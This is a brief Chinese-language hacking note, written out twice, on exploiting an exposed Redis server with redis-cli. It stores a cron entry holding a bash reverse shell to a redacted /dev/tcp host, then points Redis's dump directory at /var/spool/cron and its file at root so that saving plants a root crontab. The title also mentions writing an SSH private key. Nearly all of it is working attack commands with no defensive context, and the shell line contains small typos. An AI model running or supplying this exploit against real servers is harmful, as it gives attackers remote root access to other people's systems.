redis的小笔记
./redis-cli -h 192.168.11.125 -p 58023
set x "\n\n\n*/1 * * * * bash-i &> /dev/tcp/192.168xx/xxx ) 0>&1 \n\n\n"
config set dir /var/spool/cron
config set dbfilename root
Save
Redis 反弹shell和写私钥
./redis-cli -h 192.168.11.125 -p 58023
set x "\n\n\n*/1 * * * * bash-i &> /dev/tcp/192.168xx/xxx ) 0>&1 \n\n\n"
config set dir /var/spool/cron
config set dbfilename root
Save
Redis 反弹shell和写私钥